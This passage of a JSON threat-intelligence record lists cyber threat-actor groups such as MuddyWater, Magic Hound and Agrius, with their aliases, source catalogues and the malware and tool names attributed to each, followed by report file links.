			"deleted_at": null,
			"main_name": "Handala",
			"aliases": [],
			"source_name": "MISPGALAXY:Handala",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b1979c55-037a-415f-b0a3-cab7933f5cd4",
			"created_at": "2024-04-24T02:00:49.561432Z",
			"updated_at": "2026-04-10T02:00:05.416794Z",
			"deleted_at": null,
			"main_name": "APT-C-23",
			"aliases": [
				"APT-C-23",
				"Arid Viper",
				"Desert Falcon",
				"TAG-63",
				"Grey Karkadann",
				"Big Bang APT",
				"Two-tailed Scorpion"
			],
			"source_name": "MITRE:APT-C-23",
			"tools": [
				"Micropsia"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d1dcfc37-1f9b-4acd-a023-25153f183c2e",
			"created_at": "2025-08-07T02:03:24.783147Z",
			"updated_at": "2026-04-10T02:00:03.664754Z",
			"deleted_at": null,
			"main_name": "COBALT SHADOW",
			"aliases": [
				"AMERICIUM ",
				"Agonizing Serpens ",
				"Agrius",
				"Agrius ",
				"BlackShadow",
				"DEV-0227 ",
				"Justice Blade ",
				"Malek Team",
				"Malek Team ",
				"MoneyBird ",
				"Pink Sandstorm ",
				"Sharp Boyz ",
				"Spectral Kitten "
			],
			"source_name": "Secureworks:COBALT SHADOW",
			"tools": [
				"Apostle",
				"DEADWOOD",
				"Fantasy wiper",
				"IPsec Helper",
				"MiniDump",
				"Moneybird ransomware",
				"Sandals",
				"SecretsDump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "929d794b-0e1d-4d10-93a6-29408a527cc2",
			"created_at": "2023-01-06T13:46:38.70844Z",
			"updated_at": "2026-04-10T02:00:03.075002Z",
			"deleted_at": null,
			"main_name": "AridViper",
			"aliases": [
				"Desert Falcon",
				"Arid Viper",
				"APT-C-23",
				"Bearded Barbie",
				"Two-tailed Scorpion"
			],
			"source_name": "MISPGALAXY:AridViper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4023e661-f566-4b5b-a06f-9d370403f074",
			"created_at": "2024-02-02T02:00:04.064685Z",
			"updated_at": "2026-04-10T02:00:03.547155Z",
			"deleted_at": null,
			"main_name": "Pink Sandstorm",
			"aliases": [
				"AMERICIUM",
				"BlackShadow",
				"DEV-0022",
				"Agrius",
				"Agonizing Serpens",
				"UNC2428",
				"Black Shadow",
				"SPECTRAL KITTEN"
			],
			"source_name": "MISPGALAXY:Pink Sandstorm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8d28f58b-5ea2-4450-a74a-4a1e39caba6e",
			"created_at": "2026-03-16T02:02:50.582318Z",
			"updated_at": "2026-04-10T02:00:03.777263Z",
			"deleted_at": null,
			"main_name": "COASTLIGHT",
			"aliases": [
				"Gonjeshke Darande",
				"Indra",
				"Predatory Sparrow"
			],
			"source_name": "Secureworks:COASTLIGHT",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7d982d5b-3428-483c-8804-c3ab774f1861",
			"created_at": "2024-11-01T02:00:52.70975Z",
			"updated_at": "2026-04-10T02:00:05.357255Z",
			"deleted_at": null,
			"main_name": "Agrius",
			"aliases": [
				"Agrius",
				"Pink Sandstorm",
				"AMERICIUM",
				"Agonizing Serpens",
				"BlackShadow"
			],
			"source_name": "MITRE:Agrius",
			"tools": [
				"NBTscan",
				"Mimikatz",
				"IPsec Helper",
				"Moneybird",
				"MultiLayer Wiper",
				"DEADWOOD",
				"BFG Agonizer",
				"ASPXSpy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "786139da-4139-49d0-9685-e249c5f89f25",
			"created_at": "2024-12-30T02:01:48.731055Z",
			"updated_at": "2026-04-10T02:00:04.763086Z",
			"deleted_at": null,
			"main_name": "TA455",
			"aliases": [
				"Bohrium",
				"DEV-0056",
				"Operation Iranian Dream Job",
				"Smoke Sandstorm",
				"TA455",
				"UNC1549",
				"Yellow Dev 13"
			],
			"source_name": "ETDA:TA455",
			"tools": [
				"LIGHTRAIL",
				"MINIBIKE",
				"SlugResin",
				"SnailResin"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7f25e108-e694-49b6-a494-c8458b33eb3f",
			"created_at": "2024-01-09T02:00:04.199217Z",
			"updated_at": "2026-04-10T02:00:03.509338Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [],
			"source_name": "MISPGALAXY:HomeLand Justice",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf",
			"created_at": "2024-01-18T02:02:34.189827Z",
			"updated_at": "2026-04-10T02:00:04.721082Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [
				"Banished Kitten",
				"Karma",
				"Red Sandstorm",
				"Storm-0842",
				"Void Manticore"
			],
			"source_name": "ETDA:HomeLand Justice",
			"tools": [
				"BABYWIPER",
				"BiBi Wiper",
				"BiBi-Linux Wiper",
				"BiBi-Windows Wiper",
				"Cl Wiper",
				"LowEraser",
				"No-Justice Wiper",
				"Plink",
				"PuTTY Link",
				"RevSocks",
				"W2K Res Kit"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b3ebf51d-8f64-48a9-bbfb-674db872cccb",
			"created_at": "2025-08-07T02:03:24.769383Z",
			"updated_at": "2026-04-10T02:00:03.860954Z",
			"deleted_at": null,
			"main_name": "COBALT MYSTIQUE",
			"aliases": [
				"Banished Kitten ",
				"DEV-0842 ",
				"Druidfly ",
				"Handala Hack Team",
				"Homeland Justice",
				"Karmabelow80",
				"Red Sandstorm ",
				"Storm-0842 ",
				"Void Manticore "
			],
			"source_name": "Secureworks:COBALT MYSTIQUE",
			"tools": [
				"AllinOneNeo",
				"Bibi",
				"GramPy",
				"GramPyLoader"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e5cad6bf-fa91-4128-ba0d-2bf3ff3c6c6b",
			"created_at": "2025-08-07T02:03:24.53077Z",
			"updated_at": "2026-04-10T02:00:03.680525Z",
			"deleted_at": null,
			"main_name": "ALUMINUM SARATOGA",
			"aliases": [
				"APT-C-23",
				"Arid Viper",
				"Desert Falcon",
				"Extreme Jackal ",
				"Gaza Cybergang",
				"Molerats ",
				"Operation DustySky ",
				"TA402"
			],
			"source_name": "Secureworks:ALUMINUM SARATOGA",
			"tools": [
				"BlackShades",
				"BrittleBush",
				"DarkComet",
				"LastConn",
				"Micropsia",
				"NimbleMamba",
				"PoisonIvy",
				"QuasarRAT",
				"XtremeRat"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "35b3e533-7483-4f07-894e-2bb3ac855207",
			"created_at": "2025-08-07T02:03:24.540035Z",
			"updated_at": "2026-04-10T02:00:03.69627Z",
			"deleted_at": null,
			"main_name": "ALUMINUM SHADYSIDE",
			"aliases": [
				"APT-C-23 ",
				"Arid Viper ",
				"Desert Falcon "
			],
			"source_name": "Secureworks:ALUMINUM SHADYSIDE",
			"tools": [
				"Micropsia",
				"SpyC23"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b0d51a1b-38b1-4cfb-bee0-cad7ad2b9651",
			"created_at": "2025-05-29T02:00:03.196955Z",
			"updated_at": "2026-04-10T02:00:03.852653Z",
			"deleted_at": null,
			"main_name": "DieNet",
			"aliases": [
				"Shiite_Harvest"
			],
			"source_name": "MISPGALAXY:DieNet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0dc20eeb-81e3-48ef-9a12-7b38fdcf07b1",
			"created_at": "2025-09-20T02:04:46.693616Z",
			"updated_at": "2026-04-10T02:00:03.735806Z",
			"deleted_at": null,
			"main_name": "COBALT SMOKEY",
			"aliases": [
				"Nimbus Manticore ",
				"Smoke Sandstorm ",
				"Subtle Snail ",
				"TA455 ",
				"UNC1549 "
			],
			"source_name": "Secureworks:COBALT SMOKEY",
			"tools": [
				"LIGHTRAIL",
				"MINIBIKE",
				"MINIBUS"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "219ddb41-2ea8-4121-8b63-8c762f7e15df",
			"created_at": "2023-01-06T13:46:39.384442Z",
			"updated_at": "2026-04-10T02:00:03.309654Z",
			"deleted_at": null,
			"main_name": "Predatory Sparrow",
			"aliases": [
				"Indra",
				"Gonjeshke Darande"
			],
			"source_name": "MISPGALAXY:Predatory Sparrow",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434471,
	"ts_updated_at": 1775792119,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f77e3b05ceeff8819d6be2144932817ad3edc2a7.pdf",
		"text": "https://archive.orkl.eu/f77e3b05ceeff8819d6be2144932817ad3edc2a7.txt",
		"img": "https://archive.orkl.eu/f77e3b05ceeff8819d6be2144932817ad3edc2a7.jpg"
	}
}